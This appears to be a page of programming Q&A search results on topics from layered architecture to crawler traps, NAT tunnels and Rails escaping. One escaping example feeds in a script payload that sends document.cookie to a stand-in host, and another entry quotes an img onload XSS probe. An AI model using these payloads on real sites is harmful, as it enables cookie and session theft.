Search Results

Search found 471 results on 19 pages for 'hole punching'.

Page 16/19 | < Previous Page | 12 13 14 15 16 17 18 19  | Next Page >

  • Architectural conundrum

    - by Dejan
    The worst thing about working on a one-man project is the lack of input you would normally get from coworkers, and without it you tend to make obvious mistakes. After going down that road for some time, I need some help from the community. I started a little home-brew project that should turn into a portal of sorts, and the main thing bothering me is the persistence layer I have concocted. It should be completely separated from the presentation layer for starters, and an OR mapper sits somewhere in between, because I have multiple data stores that have to be used. The base idea is that the individual "repositories" each operate on their own database, the business layer then aggregates the business objects, and those are transformed in the presentation layer into view objects. The main problem I face is the following: multiple classes for the same concept - there is a DAL representation of a user, a BL representation of a user, and a view representation of a user. I can handle the transformation with a tool, but is this really the right way? They are all nicely separated, but the overhead is quite something. What do you think? Am I going too deep into the separation-of-concerns rabbit hole, or is this still normal?
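
    A minimal sketch of the layering being described, in Java. The class and field names (UserRecord, User, UserView, UserMapper) are purely illustrative, not from the original question:

      // Hypothetical illustration of one concept ("user") living in three layers.

      // DAL: mirrors the row in one particular data store.
      class UserRecord {
          long id;
          String userName;
          String emailAddress;
      }

      // BL: the aggregated business object the rest of the application works with.
      class User {
          long id;
          String name;
          String email;
      }

      // Presentation: only what the view needs, already formatted.
      class UserView {
          String displayName;
      }

      // The mapping overhead the question is about: one translator per boundary.
      class UserMapper {
          static User fromRecord(UserRecord r) {
              User u = new User();
              u.id = r.id;
              u.name = r.userName;
              u.email = r.emailAddress;
              return u;
          }

          static UserView toView(User u) {
              UserView v = new UserView();
              v.displayName = u.name + " <" + u.email + ">";
              return v;
          }

          public static void main(String[] args) {
              UserRecord r = new UserRecord();
              r.id = 42; r.userName = "dejan"; r.emailAddress = "dejan@example.org";
              System.out.println(toView(fromRecord(r)).displayName);
          }
      }

    Whether that duplication is acceptable is exactly the trade-off the question is asking about.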

    Read the article

  • What harm can javascript do?

    - by The King
    I just happened to read Joel's blog here... So for example if you have a web page that says “What is your name?” with an edit box, and submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer”, and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site. Since JavaScript runs on the client, all it can access or do is on the client. It can read information stored in hidden fields and change it. It can read, write, or manipulate cookies... But I feel this information is available to the attacker anyway (if he is smart enough to pass JavaScript through a textbox), so we are not empowering him with new information or giving him undue access to our server... Just curious to know whether I am missing something. Can you list the things that a malicious user can do with this security hole? Edit: Thanks to all for the enlightenment. As kizzx2 pointed out in one of the comments, I was overlooking the fact that JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.
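
    The hole being discussed is stored XSS: whatever User A types gets echoed back as HTML that User B's browser then executes. A minimal sketch of closing it on the server side by escaping output, in Java (a hand-rolled escaper shown only for illustration; in practice you would reach for a vetted library routine):

      public class HtmlEscape {

          // Replace the characters that let user input break out of plain text
          // and become markup or script.
          public static String escapeHtml(String input) {
              StringBuilder out = new StringBuilder(input.length());
              for (char c : input.toCharArray()) {
                  switch (c) {
                      case '&':  out.append("&amp;");  break;
                      case '<':  out.append("&lt;");   break;
                      case '>':  out.append("&gt;");   break;
                      case '"':  out.append("&quot;"); break;
                      case '\'': out.append("&#39;");  break;
                      default:   out.append(c);
                  }
              }
              return out.toString();
          }

          public static void main(String[] args) {
              String name = "<script>document.location='http://evil.example/?c=' + document.cookie</script>";
              // Unescaped, this would run in every later visitor's browser;
              // escaped, it renders as harmless text.
              System.out.println("Hello, " + escapeHtml(name) + "!");
          }
      }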

    Read the article

  • Is functional GUI programming possible?

    - by eman
    I've recently caught the FP bug (trying to learn Haskell), and I've been really impressed with what I've seen so far (first-class functions, lazy evaluation, and all the other goodies). I'm no expert yet, but I've already begun to find it easier to reason "functionally" than imperatively for basic algorithms (and I'm having trouble going back when I have to). The one area where current FP seems to fall flat, however, is GUI programming. The Haskell approach seems to be to just wrap imperative GUI toolkits (such as GTK+ or wxWidgets) and to use "do" blocks to simulate an imperative style. I haven't used F#, but my understanding is that it does something similar using OOP with .NET classes. Obviously, there's a good reason for this--current GUI programming is all about IO and side effects, so purely functional programming isn't possible with most current frameworks. My question is: is it possible to have a functional approach to GUI programming? I'm having trouble imagining what this would look like in practice. Does anyone know of any frameworks, experimental or otherwise, that try this sort of thing (or even any frameworks that are designed from the ground up for a functional language)? Or is the solution to just use a hybrid approach, with OOP for the GUI parts and FP for the logic? (I'm just asking out of curiosity--I'd love to think that FP is "the future," but GUI programming seems like a pretty large hole to fill.)

    Read the article

  • Codeplex/Sourceforge for internal use

    - by Josh
    I'm looking for a free/open source collaborative project manager that can be deployed internally in my workplace and would act similar to Codeplex or Sourceforge. Does anyone know of something like this, and if so, do you have experience with it? Requirements: open source or free; locally deployable; has the same types of features found in Sourceforge/Codeplex - issue/feature tracking, community interaction (i.e. voting, roles, etc.), SCM integration (optional), and .NET/Windows friendly (optional). Every business ends up having internal utilities and domain-specific apps that developers create to make life easier. Given the input of the internal developer community they have the potential to become much better (can you say GMail...), and I would simply like to foster such an environment internally by providing an easy place for that interaction to take place. UPDATE: So I like what I am seeing in both Trac and GForge, but both are heavily geared towards UNIX/Subversion environments. I should have specified this, but we are an MS shop from top to bottom. How practical do you think it is going to be to try and use these in an MS .NET environment? Would that be like trying to shove a square peg through a round hole?

    Read the article

  • How to restrain oneself from the overwhelming urge to rewrite everything?

    - by Scott Saad
    Setup: Have you ever had the experience of going into a piece of code to make a seemingly simple change and then realizing that you've just stepped into a wasteland that deserves some serious attention? This usually gets followed up with an official FREAK OUT moment, where the overwhelming urge to rewrite everything in sight starts to creep up. It's important to note that this bad code does not necessarily come from others, as it may indeed be something we've written or contributed to in the past. Problem: It's obvious that there is some serious code rot, horrible architecture, etc. that needs to be dealt with. The real problem, as it relates to this question, is that it's not the right time to rewrite the code. There could be many reasons for this: we're currently in the middle of a release cycle, so any changes should be minimal; it's 2:00 AM and the brain is starting to shut down; it could have seemingly adverse effects on the schedule; the rabbit hole could go much deeper than our eyes are able to see at this time; etc. Question: So how should we balance the duty of continuously improving the code with being a responsible developer? How do we refrain from contributing to the broken window theory, while also being aware of our actions and the potential recklessness they may cause? Update: Great answers! For the most part, there seem to be two schools of thought: don't resist the urge, as it's a good one to have; or don't give in to the temptation, as it will burn you to the ground. It would be interesting to know if more people feel any balance exists.

    Read the article

  • Lucene (.NET) Document structure and performance suggestions

    - by Josh Handel
    Hello, I am indexing about 100M documents that consist of a few string identifiers and a hundred or so numeric terms. I won't be doing range queries, so I haven't dug too deep into NumericField, but I don't think it's the right choice here. My problem is that query performance degrades quickly when I start adding OR criteria to my query. All my queries are on specific numeric terms. So a document looks like StringField:[someString] and N DataField:[someNumber]. I then query it with something like DataField:((+1 +(2 3)) (+75 +(3 5 52)) (+99 +88 +(102 155 199))). Currently these queries take about 7 to 16 seconds to run on my laptop. I would like to make sure that's really the best they can do. I am open to suggestions on field structure and query structure :-). Thanks, Josh. PS: I have already read over all the other Lucene performance discussions on here, on the Lucene wiki, and at Lucid Imagination... I'm a bit further down the rabbit hole than that...
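
    For reference, a sketch of how a query of that shape is assembled programmatically against the Java Lucene API of that era (Lucene.NET mirrors it closely). The field name and term values are taken from the example above; the class and helper names are illustrative:

      import org.apache.lucene.index.Term;
      import org.apache.lucene.search.BooleanClause.Occur;
      import org.apache.lucene.search.BooleanQuery;
      import org.apache.lucene.search.TermQuery;

      public class QueryShape {

          // One group like (+1 +(2 3)): term "1" is required, and at least
          // one of the alternatives must also match.
          static BooleanQuery group(String field, String required, String... alternatives) {
              BooleanQuery alternativeSet = new BooleanQuery();
              for (String a : alternatives) {
                  alternativeSet.add(new TermQuery(new Term(field, a)), Occur.SHOULD);
              }
              BooleanQuery clause = new BooleanQuery();
              clause.add(new TermQuery(new Term(field, required)), Occur.MUST);
              clause.add(alternativeSet, Occur.MUST);
              return clause;
          }

          public static void main(String[] args) {
              // The top-level groups are OR'd together (SHOULD):
              // DataField:((+1 +(2 3)) (+75 +(3 5 52)) ...)
              BooleanQuery top = new BooleanQuery();
              top.add(group("DataField", "1", "2", "3"), Occur.SHOULD);
              top.add(group("DataField", "75", "3", "5", "52"), Occur.SHOULD);
              System.out.println(top);
          }
      }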

    Read the article

  • Data mining - parsing a log file in Java

    - by nuvio
    Hello, I am working on a Java project for university in which I have to analyse poker hands. I found some poker hands in a txt log file. They typically look like this:

      PokerStars Zoom Hand #86981279921: Hold'em No Limit ($0.10/$0.25 USD) - 2012/09/30 23:49:51 ET
      Table 'Whirlpool Zoom 40-100 bb' 9-max Seat #1 is the button
      Seat 1: lgwong ($30.99 in chips)
      Seat 2: hastyboots ($28.61 in chips)
      Seat 3: seula i ($25.31 in chips)
      Seat 4: fr_kevin01 ($31.81 in chips)
      Seat 5: limey05 ($27.45 in chips)
      Seat 6: sanlu ($24.65 in chips)
      Seat 7: Masterfrank ($25.35 in chips)
      Seat 8: Refu$e2Lose ($33.23 in chips)
      Seat 9: 1pepepe0114 ($37.62 in chips)
      hastyboots: posts small blind $0.10
      seula i: posts big blind $0.25
      *** HOLE CARDS ***
      fr_kevin01: folds
      limey05: folds
      sanlu: folds
      Masterfrank: folds
      Refu$e2Lose: folds
      1pepepe0114: folds
      lgwong: folds
      hastyboots: folds
      Uncalled bet ($0.15) returned to seula i
      seula i collected $0.20 from pot
      seula i: doesn't show hand
      *** SUMMARY ***
      Total pot $0.20 | Rake $0
      Seat 1: lgwong (button) folded before Flop (didn't bet)
      Seat 2: hastyboots (small blind) folded before Flop
      Seat 3: seula i (big blind) collected ($0.20)
      Seat 4: fr_kevin01 folded before Flop (didn't bet)
      Seat 5: limey05 folded before Flop (didn't bet)
      Seat 6: sanlu folded before Flop (didn't bet)
      Seat 7: Masterfrank folded before Flop (didn't bet)
      Seat 8: Refu$e2Lose folded before Flop (didn't bet)
      Seat 9: 1pepepe0114 folded before Flop (didn't bet)

    My problem is that I am not sure how to proceed with parsing the log file: the only approach I know is "manually" scanning line by line for a particular character or symbol, but I am afraid that would need exhaustive error handling. So I was wondering whether there are any other techniques or a better way to parse these poker hands? Many thanks for your help.
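
    A minimal sketch of the usual alternative to ad-hoc character scanning: one regular expression per line type, in Java. The class name and the single pattern shown (for the seat lines) are illustrative only:

      import java.util.regex.Matcher;
      import java.util.regex.Pattern;

      public class HandHistoryParser {

          // "Seat 3: seula i ($25.31 in chips)" -> seat number, player name, stack.
          private static final Pattern SEAT_LINE =
                  Pattern.compile("^Seat (\\d+): (.+) \\(\\$([\\d.]+) in chips\\)$");

          public static void parseLine(String line) {
              Matcher m = SEAT_LINE.matcher(line);
              if (m.matches()) {
                  int seat = Integer.parseInt(m.group(1));
                  String player = m.group(2);
                  double stack = Double.parseDouble(m.group(3));
                  System.out.printf("seat=%d player=%s stack=%.2f%n", seat, player, stack);
                  return;
              }
              // Other line types (blinds, actions, summary) get their own patterns;
              // a line that matches none of them is the error case to handle.
          }

          public static void main(String[] args) {
              parseLine("Seat 3: seula i ($25.31 in chips)");
              parseLine("seula i: posts big blind $0.25");
          }
      }

    A full parser would typically keep track of which section of the hand it is in (setup, pre-flop, summary) and only try the patterns relevant to that section.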

    Read the article

  • Prevent JavaScript in the WMD editor's preview box

    - by Justin Grant
    There are many SO questions (e.g. here and here) about how to do server-side scrubbing of Markdown produced by the WMD editor, to ensure the generated HTML doesn't contain malicious script like this: <img onload="alert('haha');" src="http://www.google.com/intl/en_ALL/images/srpr/logo1w.png" /> Unfortunately, this still allows script to show up in the WMD client's preview box. I doubt this is a big deal, since if you're scrubbing the HTML on the server an attacker can't save the bad HTML, so no one else will be able to see it later and have their cookies stolen or sessions hijacked by the bad script. But it's still kinda odd to allow an attacker to run any script in the context of your site, and it's probably a bad idea for the client preview window to allow different HTML than your server does. StackOverflow has clearly plugged this hole. How did they do it? [NOTE: I already figured this out but it required some tricky JavaScript debugging, so I'm answering my own question here to help others who may want to do the same thing]

    Read the article

  • What techniques can be used to detect so-called "black holes" (spider traps) when creating a web crawler?

    - by Tom
    When creating a web crawler, you have to design some kind of system that gathers links and adds them to a queue. Some, if not most, of these links will be dynamic: they appear to be different, but add no value, as they are created specifically to fool crawlers. An example: we tell our crawler to crawl the domain evil.com by entering an initial lookup URL. Let's assume we let it crawl the front page initially, evil.com/index. The returned HTML will contain several "unique" links: evil.com/somePageOne, evil.com/somePageTwo, evil.com/somePageThree. The crawler will add these to the buffer of uncrawled URLs. When somePageOne is being crawled, the crawler receives more URLs: evil.com/someSubPageOne, evil.com/someSubPageTwo. These appear to be unique, and so they are. They are unique in the sense that the returned content is different from previous pages and that the URL is new to the crawler; however, this is only because the developer has made a "loop trap" or "black hole". The crawler will add this new sub page, and the sub page will have another sub page, which will also be added. This process can go on infinitely. The content of each page is unique but totally useless (it is randomly generated text, or text pulled from a random source). Our crawler will keep finding new pages which we are actually not interested in. These loop traps are very difficult to find, and if your crawler does not have anything in place to prevent them, it will get stuck on a certain domain forever. My question is: what techniques can be used to detect so-called black holes? One of the most common answers I have heard is the introduction of a limit on the number of pages to be crawled. However, I cannot see how this can be a reliable technique when you do not know what kind of site is to be crawled. A legit site, like Wikipedia, can have hundreds of thousands of pages, and such a limit could produce false positives for those kinds of sites. Any feedback is appreciated. Thanks.
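
    Two of the cheaper heuristics that are often combined for this problem are a cap on URL path depth and a per-host page budget. A sketch in Java - the thresholds and class name are illustrative, and this is a starting point rather than a definitive detector:

      import java.net.URI;
      import java.util.HashMap;
      import java.util.Map;

      public class TrapHeuristics {

          private static final int MAX_PATH_DEPTH = 8;           // illustrative threshold
          private static final int MAX_PAGES_PER_HOST = 50_000;  // illustrative threshold

          private final Map<String, Integer> pagesPerHost = new HashMap<>();

          // Returns true if the URL still looks worth crawling under the heuristics.
          public boolean shouldCrawl(String url) {
              URI uri = URI.create(url);
              String host = uri.getHost();
              String path = uri.getPath() == null ? "" : uri.getPath();
              if (host == null) {
                  return false; // relative or malformed URL; resolve it first
              }

              // 1. Traps built from ever-deeper links eventually exceed any sane depth.
              int depth = path.split("/").length;
              if (depth > MAX_PATH_DEPTH) {
                  return false;
              }

              // 2. A per-host budget bounds the damage even when the trap stays shallow.
              //    (Large legitimate sites can be given a bigger budget, or the budget
              //    can grow with the number of crawled pages that turned out useful,
              //    which addresses the Wikipedia false-positive concern above.)
              int seen = pagesPerHost.merge(host, 1, Integer::sum);
              return seen <= MAX_PAGES_PER_HOST;
          }

          public static void main(String[] args) {
              TrapHeuristics h = new TrapHeuristics();
              System.out.println(h.shouldCrawl("http://evil.com/somePageOne"));            // true
              System.out.println(h.shouldCrawl("http://evil.com/a/b/c/d/e/f/g/h/i/j"));    // false, too deep
          }
      }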

    Read the article

  • How do I configure multiple Ubuntu Python installations to avoid App Engine's SSL error?

    - by Linc
    I have Karmic Koala, which has Python 2.6 installed by default. However, I can't run any Python App Engine projects because they require Python 2.5 and the Python ssl module. To install ssl I installed python2.5-dev first, while following some instructions I found elsewhere:

      sudo apt-get install libssl-dev
      sudo apt-get install python-setuptools
      sudo apt-get install python2.5-dev
      sudo easy_install-2.5 pyopenssl

    However, I am afraid this is not good for my Ubuntu installation, since Ubuntu expects to see version 2.6 of Python when you type 'python' on the command line. Instead, it says '2.5.5'. I tried to revert to the original default version of Python by doing this:

      sudo apt-get remove python2.5-dev

    But that didn't seem to do anything either - when I type 'python' on the command line it still says 2.5.5. And App Engine still doesn't work after all this. I continue to get an SSL-related error whenever I try to run my Python app: AttributeError: 'module' object has no attribute 'HTTPSHandler'. UPDATE: Just checked whether SSL actually installed as a result of those commands by typing this:

      $ python2.5
      Python 2.5.5 (r255:77872, Apr 29 2010, 23:59:20)
      [GCC 4.4.1] on linux2
      Type "help", "copyright", "credits" or "license" for more information.
      >>> import ssl
      Traceback (most recent call last):
        File "<stdin>", line 1, in <module>
      ImportError: No module named ssl
      >>>

    As you can see, SSL is still not installed, which explains the continuing App Engine error. If anyone knows how I can dig myself out of this hole, I would appreciate it.

    Read the article

  • What to do when you are completely burnt out from working on a project?

    - by dfafa
    So I started this SaaS project around July 2009, expecting to finish it in 2 months. I ended up working on it for about 4 months straight, spending about 6~12 hours nearly every day. Then one day I just couldn't bear to look at the code. It seems like my efforts are being sucked in by some black hole; I would need to put in a lot of work to make incremental changes. I felt burnt out in December... and now it's May. I am working on the project for maybe 10 hours every 2 weeks, and I am not getting much done. It seems like it will never be perfect; the more I code, the more problems and bugs there are to fix, and it's absolutely sickening. So what should I do now? I have invested all of my available time and money, I've shut off all social connections, and I have basically been spending most of my time in my room working on my project alone. I feel consumed by this project I created, ironically, to make my life easier.

    Read the article

  • Multiple inputs on a single line with Twitter Bootstrap and Simple Form 2.0

    - by noel_g
    I am using simple_form 2.0 with Twitter Bootstrap. I am trying to determine the proper wrapper format in order to get something like [city] [State] [Zip]. I believe my form needs to be:

      <div class="control-group">
        <%= f.input :city, :wrapper => :small, :placeholder => "City", :input_html => { :class => "span2", :maxlength => 10 }, :label => false %>
        <%= f.input :region, :wrapper => :small, :placeholder => "Region", :input_html => { :class => "span1", :maxlength => 5 }, :label => false %>
        <%= f.input :postal_code, :wrapper => :small, :placeholder => "Postal Code", :input_html => { :class => "span2", :maxlength => 10 }, :label => false %>
      </div>

    I tried this wrapper:

      config.wrappers :small, :tag => 'div', :class => 'controls inline-inputs', :error_class => 'error' do |b|
        b.use :placeholder
        b.use :label_input
      end

    I believe I would need to define the CSS as well, but before I go down a rabbit hole I thought I would ask if this is built in somewhere.

    Read the article

  • Why can I call a non-const member function pointer from a const method?

    - by sdg
    A co-worker asked about some code like this that originally had templates in it. I have removed the templates, but the core question remains: why does this compile OK?

      #include <iostream>

      class X
      {
        public:
          void foo() { std::cout << "Here\n"; }
      };

      typedef void (X::*XFUNC)();

      class CX
      {
        public:
          explicit CX(X& t, XFUNC xF) : object(t), F(xF) {}
          void execute() const { (object.*F)(); }
        private:
          X& object;
          XFUNC F;
      };

      int main(int argc, char* argv[])
      {
        X x;
        const CX cx(x, &X::foo);
        cx.execute();
        return 0;
      }

    Given that CX is a const object and its member function execute is const, the this pointer inside CX::execute is const. But I am able to call a non-const member function through a member function pointer. Are member function pointers a documented hole in the const-ness of the world? What (presumably obvious to others) issue have we missed?

    Read the article

  • Preventing HTML character entities in locale files from getting munged by Rails 3 XSS protection

    - by Chris S
    We're building an app, our first using Rails 3, and we're having to build I18n in from the outset. Being perfectionists, we want real typography to be used in our views: dashes, curled quotes, ellipses et al. This means in our locales/xx.yml files we have two choices: use real UTF-8 characters inline - this should work, but they are hard to type, and it scares me given the amount of software which still does naughty things to Unicode; or use HTML character entities (&#8217; &#8212; etc.) - easier to type, and probably more compatible with misbehaving software. I'd rather take the second option; however, the auto-escaping in Rails 3 makes this problematic, as the ampersands in the YAML get auto-converted into character entities themselves, resulting in 'visible' &#8217;s in the browser. Obviously this can be worked around by using raw on strings, i.e.: raw t('views.signup.organisation_details'). But we're not happy going down the route of globally raw-ing every time we t something, as it leaves us open to making an error and producing an XSS hole. We could selectively raw strings which we know contain character entities, but this would be hard to scale, and it just feels wrong - besides, a string which contains an entity in one language may not in another. Any suggestions on a clever Rails-y way to fix this? Or are we doomed to crap typography, XSS holes, hours of wasted effort, or all three?

    Read the article

  • Joomla and allow_url_fopen [closed]

    - by liz
    So I have been reading about the pros and cons of allowing allow_url_fopen, but I am still confused. After a recent hacking incident (which I believe had nothing to do with allow_url_fopen), my host turned allow_url_fopen off. The thing I don't get is this: in Joomla 2.5.x there is an updating feature - you can search for new versions and be notified if things are out of date. There is a big security hole if Joomla or its extensions get out of date, but the catch is that the feature needs allow_url_fopen turned on. So why did Joomla build a security risk into a feature meant to improve security? Is it okay to turn allow_url_fopen on and have the updating feature? To clarify my question: I have Joomla installed and I have cURL installed. When I run the update discovery through native Joomla I get a request for fopen. Shouldn't I be able to get updates without needing to enable a security risk? I am running version 2.5.8 of Joomla.

    Read the article

  • What is the benefit of using ONLY OpenID authentication on a site?

    - by Peter
    From my experience with OpenID, I see a number of significant downsides. It adds a single point of failure to the site, and not a failure that can be fixed by the site even if detected: if the OpenID provider is down for three days, what recourse does the site have to allow its users to log in and access the information they own? It takes the user to another site's content every time they log on to your site: even if the OpenID provider does not have an error, the user is redirected to the provider's site to log in. That login page has content and links, so there is a chance a user will actually be drawn away from your site to go down the Internet rabbit hole. Why would I want to send my users to another company's website? [Note: my provider no longer does this and seems to have fixed this problem (for now).] It adds a non-trivial amount of time to signup: to sign up with the site, a new user is forced to read a new standard, choose a provider, and sign up. Standards are something that technical people should agree to in order to make the user experience frictionless; they are not something that should be thrust on users. Finally, it is a phisher's dream: OpenID is incredibly insecure, and stealing a person's ID as they log in is trivially easy. [taken from David Arno's answer below] For all of the downsides, the one upside is to allow users to have fewer logins on the Internet. If a site has opt-in for OpenID, then users who want that feature can use it. What I would like to understand is: what benefit does a site get from making OpenID mandatory?

    Read the article

  • Can I get debug symbols for Flash Player? Or any other way to get support for Flash?

    - by Tim
    The company I am working for has a Flash component (using Flex and CS4) that crashes intermittently in Chrome, FF and IE (so far only on Win32 platforms). I submitted a bug report to Adobe but have not heard anything back from them; their support process seems like a black hole. We can get a dump from Flash using these steps, but after submitting the bug we got no help at all. We loaded this into MS Visual Studio but can't get decent stack information because there are no symbols for the Flash code. Microsoft and other companies provide symbols to help with debugging, and we would like to get that from Adobe. Is there any way to make progress on this? Does anyone know where to get Flash symbols, or how else we can make progress? It is hard to debug the process if the container just dies. The binary is flash10c.ocx. I just spent a painful hour on the phone with Adobe folks - and the final answer from one of them (I spoke to about 8 people) was that they do not have a per-incident purchase plan for developer support for Flash. I find that hard to believe. Does anyone know how to get support for Flash?

    Read the article

  • Potential problem with C standard malloc'ing chars.

    - by paxdiablo
    When answering a comment to another answer of mine here, I found what I think may be a hole in the C standard (C1X; I haven't checked the earlier ones, and yes, I know it's incredibly unlikely that I alone among all the planet's inhabitants have found a bug in the standard). Information follows: 1. Section 6.5.3.4 ("The sizeof operator") para 2 states "The sizeof operator yields the size (in bytes) of its operand". 2. Para 3 of that section states: "When applied to an operand that has type char, unsigned char, or signed char, (or a qualified version thereof) the result is 1". 3. Section 7.20.3.3 describes void *malloc(size_t sz), but all it says is "The malloc function allocates space for an object whose size is specified by size and whose value is indeterminate". It makes no mention at all of what units are used for the argument. 4. Annex E states that 8 is the minimum value for CHAR_BIT, so chars can be more than one byte in length. My question is simply this: in an environment where a char is 16 bits wide, will malloc(10 * sizeof(char)) allocate 10 chars (20 bytes) or 10 bytes? Point 1 above seems to indicate the former, point 2 indicates the latter. Anyone with more C-standard-fu than me have an answer for this?

    Read the article

  • How might one cope with the ambiguous value produced by GetDllDirectory?

    - by Integer Poet
    GetDllDirectory produces an ambiguous value. When the string this call produces is empty, it means one of the following:

      - nobody has called SetDllDirectory
      - somebody passed NULL to SetDllDirectory
      - somebody passed an empty string to SetDllDirectory

    The first two cases are equivalent for my purposes, but the third case is a problem. If I want to write save/restore code (call GetDllDirectory to save the "old" value, SetDllDirectory to set a "new" value temporarily, and later SetDllDirectory again to restore the "old" value), I run the risk of reversing some other programmer's intent. If the other programmer intended for the current working directory to be in the DLL search order (in other words, one of the first two bullets is true), and I pass an empty string to SetDllDirectory, I will be taking the current working directory out of the DLL search order, reversing the other programmer's intent. Can anyone suggest an approach to eliminate or work around this ambiguity? P.S. I know having the current working directory in the DLL search order could be interpreted as a security hole. Nevertheless, it is the default behavior, and my code is not in a position to undo that; my code needs to be compatible with the expectations of all potential callers, many of which are large and old and beyond my control.

    Read the article

  • Cookie blocked/not saved in IFRAME in Internet Explorer

    - by Piskvor
    I have two websites, let's say they're example.com and anotherexample.net. On anotherexample.net/page.html, I have an IFRAME SRC="http://example.com/someform.asp". That IFRAME displays a form for the user to fill out and submit to http://example.com/process.asp. When I open the form ("someform.asp") in its own browser window, all works well. However, when I load someform.asp as an IFRAME in IE 6 or IE 7, the cookies for example.com are not saved. In Firefox this problem doesn't appear. For testing purposes, I've created a similar setup on http://newmoon.wz.cz/test/page.php. example.com uses cookie-based sessions (and there's nothing I can do about that), so without cookies, process.asp won't execute. How do I force IE to save those cookies? Results of sniffing the HTTP traffic: in the GET /someform.asp response, there's a valid per-session Set-Cookie header (e.g. Set-Cookie: ASPKSJIUIUGF=JKHJUHVGFYTTYFY), but in the POST /process.asp request, there is no Cookie header at all. Edit3: some AJAX + server-side scripting is apparently capable of sidestepping the problem, but that looks very much like a bug, plus it opens a whole new set of security holes. I don't want my applications to use a combination of bug + security hole just because it's easy. Edit: the P3P policy was the root cause; full explanation below.

    Read the article

  • How do you use STL functions like for_each?

    - by thomas-gies
    I started using STL containers because they came in very handy when I needed the functionality of a list, set, and map and had nothing else available in my programming environment. I did not care much about the ideas behind them; the STL documentation was only interesting up to the point where it came to functions, etc., and then I skipped reading and just used the containers. But yesterday, still relaxed from my holidays, I gave it a try and wanted to go a bit more the STL way, so I used the transform function (can I have a little applause for me, thank you). From an academic point of view it really looked interesting, and it worked. But the thing that bothers me is that if you intensify the use of those functions, you need dozens of helper classes for mostly everything you want to do in your code. The whole logic of the program gets sliced into tiny pieces. This slicing is not the result of good coding habits; it's just a technical need - something that probably makes my life harder, not easier. And I learned the hard way that you should always choose the simplest approach that solves the problem at hand. And I can't see what, for example, the for_each function is doing for me that justifies the use of a helper class over several simple lines of code that sit inside a normal loop, so that everybody can see what is going on. I would like to know what you think about my concerns. Did you see it the way I do when you started working this way, and did you change your mind once you got used to it? Are there benefits that I overlooked? Or do you just ignore this stuff as I did (and will probably go on doing)? Thanks. PS: I know that there is a real for_each loop in Boost, but I ignore it here since it is just a convenient wrapper for my usual loops with iterators, I guess.

    Read the article

  • Rewarding iOS app beta testers with in-app purchase?

    - by Partridge
    My iOS app is going to be free, but with additional functionality enabled via in-app purchase. Currently beta testers are doing a great job finding bugs, and I want to reward them for their hard work. I think the least I can do is give them a full version of the app so that they don't have to buy the functionality themselves. However, I'm not sure what the best way to do this is. There do not appear to be promo codes for in-app purchases, so I can't just email out promo codes. I have all the tester device UDIDs, so when the app launches I could grab the device UDID and compare it to an internal list of 'approved' UDIDs. Is this what other developers do? My concerns: the in-app purchase content would not be tied to their iTunes account, so if beta testers move to a new device they would not be able to enable the content unless I released a new build in the App Store with their new UDID - so they may have to buy it eventually anyway. Also, having an internal list leaves a hole for hackers to modify the list and add themselves to it. What would you do?

    Read the article

  • Ruby core documentation quality

    - by karatedog
    I'm relatively new to Ruby and have limited time, so I try out simple things. Recently I needed to create a file, and because I'm lazy as hell, I ran to Google. The result: File.open(local_filename, 'w') {|f| f.write(doc) }. Shame on me, it is very straightforward; I should have done it myself. Then I wanted to check what Ruby magic the File class's methods offer, or if there's any 'simplification' when invoking those methods, so I headed for the documentation here and checked the File class. The 1.8.6 documentation presents me with "ftools.rb: Extra tools for the File class" under the 'File' class, which is not what I'm looking for. The 1.8.7 documentation seems OK for the 'File' class - there is a plethora of methods, except 'open'. The 1.9 documentation finally shows me the 'open' method. And I had much the same tour with Net::HTTP. Do I exaggerate when I think good old Turbo Pascal 7.0's documentation was better organized than Ruby's documentation is right now? Is there any other source for the uninitiated to collect knowledge from? Or is it possible that I just tumbled into a documentation hole and the rest is super-brilliant, five-star organized? Thanks

    Read the article

  • Giving write permissions to the IIS user on Windows 2003 Server

    - by Steve
    I am running a website on Windows 2003 Server and IIS 6, and I am having problems writing and deleting files in a temporary folder; I get this kind of warning: Warning: unlink(C:\Inetpub\wwwroot\cakephp\app\tmp\cache\persistent\myapp_cake_core_cake_): Permission denied in C:\Inetpub\wwwroot\cakephp\lib\Cake\Cache\Engine\FileEngine.php on line 254. I went to the tmp directory and in its properties I gave the IIS user the following permissions: Read & Execute, List Folder Contents, Read. It still shows the same warnings. In the properties window, if I click on Advanced, the IIS username appears twice: once with Allow type and Read & Execute permissions, and once with Deny type and Special permissions. My question is: should I give this user not only the Read & Execute permissions but also these: Create Attributes, Create Files/Write Data, Create Folders/Append Data, Delete Subfolders and Files, Delete? They are available to select if I click on the edit button for the username. Wouldn't I be opening a security hole if I do this? Otherwise, what can I do so my website can read and delete the files it uses? Thanks.

    Read the article

  • How to access a web service behind a NAT?

    - by jr
    We have a product we are deploying to some small businesses. It is basically a RESTful API over SSL using Tomcat. This is installed on a server in the small business and is accessed via an iPhone or other portable device, so the devices connecting to the server could come from any number of IP addresses. The problem comes with the installation: when we install this service, setting up port forwarding so the outside world can gain access to Tomcat always seems to become a problem. Much of the time the owner doesn't know the router password, and so on. I am trying to research other ways we can accomplish this. I've come up with the following and would like to hear other thoughts on the topic. 1. Set up an SSH tunnel from each client office to a central server: the remote devices would connect to that central server on a port, and that traffic would be tunneled back to Tomcat in the office (a rough sketch of this follows below). It seems kind of redundant to have SSH and then SSL, but there is really no other way to accomplish it, since end-to-end I need SSL (from device to office). I'm not sure of the performance implications here, but I know it would work. We would need to monitor the tunnel and bring it back up if it goes down, handle SSH key exchanges, etc. 2. Set up UPnP to try and configure the hole for me: it would likely work most of the time, but UPnP isn't guaranteed to be turned on. It may be a good next step. 3. Come up with some type of NAT traversal scheme: I'm just not familiar with these and uncertain of how exactly they work. We have access to a centralized server, which is required for authentication, if that makes anything easier. What else should I be looking at to get this accomplished?
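
    A rough sketch of option 1 using the JSch SSH library in Java. Everything here is illustrative - the host name, user, ports, and key path are assumptions, and a real deployment would wrap the session in monitoring/reconnect logic:

      import com.jcraft.jsch.JSch;
      import com.jcraft.jsch.Session;

      public class ReverseTunnel {
          public static void main(String[] args) throws Exception {
              JSch jsch = new JSch();
              // Assumed: the office box holds a key the central server trusts,
              // and the central server's host key is in the known_hosts file.
              jsch.addIdentity("/etc/myapp/tunnel_key");
              jsch.setKnownHosts("/etc/myapp/known_hosts");

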